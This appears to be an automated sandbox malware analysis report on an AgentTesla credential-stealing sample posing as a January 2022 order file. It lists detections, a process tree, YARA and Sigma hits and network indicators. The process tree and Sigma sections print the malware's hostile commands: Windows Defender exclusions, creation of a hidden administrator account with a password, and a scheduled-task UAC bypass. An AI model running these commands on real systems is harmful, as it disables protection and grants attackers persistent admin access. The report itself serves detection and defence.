Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report #NEW ORDER FOR JANUARY 2022.exe

Overview

General Information

Sample Name:#NEW ORDER FOR JANUARY 2022.exe
Analysis ID:553020
MD5:8b974d65bf7e334d75f57027821ac628
SHA1:f3ccc2d15a771715e6653d470f955f7095e3cd17
SHA256:c2628acd6b807facd37a0b0db1068f80fa2c87702d6a687445a9ec1dc3bc2421
Tags:agentteslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Creates an autostart registry key pointing to binary in C:\Windows
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Adds a new user with administrator rights
Injects a PE file into a foreign processes
Sigma detected: Powershell Defender Exclusion
.NET source code contains very large array initializations
Sigma detected: Hurricane Panda Activity
Adds a directory exclusion to Windows Defender
Creates autostart registry keys with suspicious names
Drops executables to the windows directory (C:\Windows) and starts them
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Sigma detected: Net.exe User Account Creation
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • #NEW ORDER FOR JANUARY 2022.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 6684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • net.exe (PID: 3604 cmdline: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add MD5: DD0561156F62BC1958CE0E370B23711B)
      • conhost.exe (PID: 4780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net1.exe (PID: 5692 cmdline: C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add MD5: B5A26C2BF17222E86B91D26F1247AF3E)
        • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • net.exe (PID: 5664 cmdline: "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add MD5: DD0561156F62BC1958CE0E370B23711B)
      • conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net1.exe (PID: 5344 cmdline: C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add MD5: B5A26C2BF17222E86B91D26F1247AF3E)
    • net.exe (PID: 6868 cmdline: "C:\Windows\system32\net.exe" localgroup users "user" /add MD5: DD0561156F62BC1958CE0E370B23711B)
      • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net1.exe (PID: 4864 cmdline: C:\Windows\system32\net1 localgroup users "user" /add MD5: B5A26C2BF17222E86B91D26F1247AF3E)
    • net.exe (PID: 6908 cmdline: "C:\Windows\system32\net.exe" localgroup administrators "user" /del MD5: DD0561156F62BC1958CE0E370B23711B)
      • conhost.exe (PID: 2628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net1.exe (PID: 7040 cmdline: C:\Windows\system32\net1 localgroup administrators "user" /del MD5: B5A26C2BF17222E86B91D26F1247AF3E)
    • schtasks.exe (PID: 6240 cmdline: "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ComSvcConfig.exe (PID: 4564 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe MD5: 2778AE0EB674B74FF8028BF4E51F1DF5)
    • aspnet_regbrowsers.exe (PID: 7068 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe MD5: B490A24A9328FD89155F075FA26C0DEC)
  • svchost.exe (PID: 7136 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4876 cmdline: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 6008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • aspnet_regbrowsers.exe (PID: 4588 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe MD5: B490A24A9328FD89155F075FA26C0DEC)
  • svchost.exe (PID: 1004 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6712 cmdline: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 6996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AddInProcess32.exe (PID: 5200 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
    • ilasm.exe (PID: 6684 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe MD5: 432EAF71554C788169F9E8258BB9FF60)
    • AddInProcess32.exe (PID: 6748 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
  • #NEW ORDER FOR JANUARY 2022.exe (PID: 5684 cmdline: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 6240 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • jsc.exe (PID: 6512 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe MD5: 2B40A449D6034F41771A460DADD53A60)
  • svchost.exe (PID: 6916 cmdline: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 1424 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • CasPol.exe (PID: 5344 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
  • svchost.exe (PID: 6728 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6852 cmdline: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" MD5: 8B974D65BF7E334D75F57027821AC628)
    • powershell.exe (PID: 5692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • RegSvcs.exe (PID: 4204 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • svchost.exe (PID: 6728 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000003B.00000000.888165359.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000003B.00000000.888165359.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 156 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                32.2.svchost.exe.470db20.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  32.2.svchost.exe.470db20.2.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    31.0.aspnet_regbrowsers.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 73 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
                      Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" , ParentImage: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, ParentProcessId: 6852, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4204
                      Sigma detected: Powershell Defender ExclusionShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" , ParentImage: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe, ParentProcessId: 6588, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, ProcessId: 6684
                      Sigma detected: Hurricane Panda ActivityShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add, CommandLine: "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" , ParentImage: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe, ParentProcessId: 6588, ProcessCommandLine: "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add, ProcessId: 5664
                      Sigma detected: Net.exe User Account CreationShow sources
                      Source: Process startedAuthor: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, CommandLine: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" , ParentImage: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe, ParentProcessId: 6588, ProcessCommandLine: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, ProcessId: 3604
                      Sigma detected: Net.exe ExecutionShow sources
                      Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, CommandLine: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" , ParentImage: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe, ParentProcessId: 6588, ProcessCommandLine: "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add, ProcessId: 3604
                      Sigma detected: Possible Applocker BypassShow sources
                      Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" , ParentImage: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, ParentProcessId: 6852, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4204
                      Sigma detected: Group Modification LoggingShow sources
                      Source: Event LogsAuthor: Alexandr Yampolskyi, SOC Prime: Data: EventID: 4728, Source: Microsoft-Windows-Security-Auditing, data 0: -, data 1: S-1-5-21-3853321935-2125563209-4053062332-1003, data 2: None, data 3: computer, data 4: S-1-5-21-3853321935-2125563209-4053062332-513, data 5: S-1-5-21-3853321935-2125563209-4053062332-1002, data 6: user, data 7: computer, data 8: 0x2005f, data 9: -
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" , ParentImage: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe, ParentProcessId: 6588, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force, ProcessId: 6684
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132866083503977576.6684.DefaultAppDomain.powershell

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: #NEW ORDER FOR JANUARY 2022.exeReversingLabs: Detection: 18%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeReversingLabs: Detection: 18%
                      Source: 37.2.aspnet_regbrowsers.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 31.0.aspnet_regbrowsers.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 31.0.aspnet_regbrowsers.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                      Source: 31.0.aspnet_regbrowsers.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 37.0.aspnet_regbrowsers.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                      Source: 31.0.aspnet_regbrowsers.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                      Source: 37.0.aspnet_regbrowsers.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                      Source: 31.0.aspnet_regbrowsers.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                      Source: 31.2.aspnet_regbrowsers.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 37.0.aspnet_regbrowsers.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                      Source: 37.0.aspnet_regbrowsers.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 37.0.aspnet_regbrowsers.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8

                      Exploits:

                      barindex
                      Yara detected UAC Bypass using CMSTPShow sources
                      Source: Yara matchFile source: 32.2.svchost.exe.5f89510.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5a90000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5a90000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.6330000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.5f70000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.5f70000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.6349510.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5aa9510.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.6330000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000026.00000003.795978697.0000000005A52000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.929093994.0000000006280000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927387694.00000000049D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.737999019.0000000005A90000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000003.850266618.0000000006E02000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.850912152.0000000006330000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.786901859.0000000005F70000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000003.814234215.0000000006432000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.920418875.0000000005C10000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.916893319.0000000004381000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.895927015.0000000005330000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Source: #NEW ORDER FOR JANUARY 2022.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: #NEW ORDER FOR JANUARY 2022.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: Binary string: aspnet_regbrowsers.pdbp source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmp
                      Source: Binary string: aspnet_regbrowsers.pdbp??? |?_CorExeMainmscoree.dll?% @ source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp
                      Source: Binary string: ???Oy??.pdbError: CoCreateInstance(IID_ISymUnmanagedWriter) returns %X source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
                      Source: Binary string: ComSvcConfig.pdb?x source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp
                      Source: Binary string: aspnet_regbrowsers.pdb source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmp
                      Source: Binary string: ilasm.pdb source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
                      Source: Binary string: E:\A\_work\940\s\obj\Editor\IntellisenseDef\Release\net472\Microsoft.VisualStudio.Language.Intellisense.pdb source: svchost.exe, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
                      Source: Binary string: ComSvcConfig.pdb source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp

                      Networking:

                      barindex
                      Uses the Telegram API (likely for C&C communication)Show sources
                      Source: unknownDNS query: name: api.telegram.org
                      Source: aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: http://YsLVkm.com
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.723973005.0000000003251000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.759358172.00000000033E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.804585113.00000000037A1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
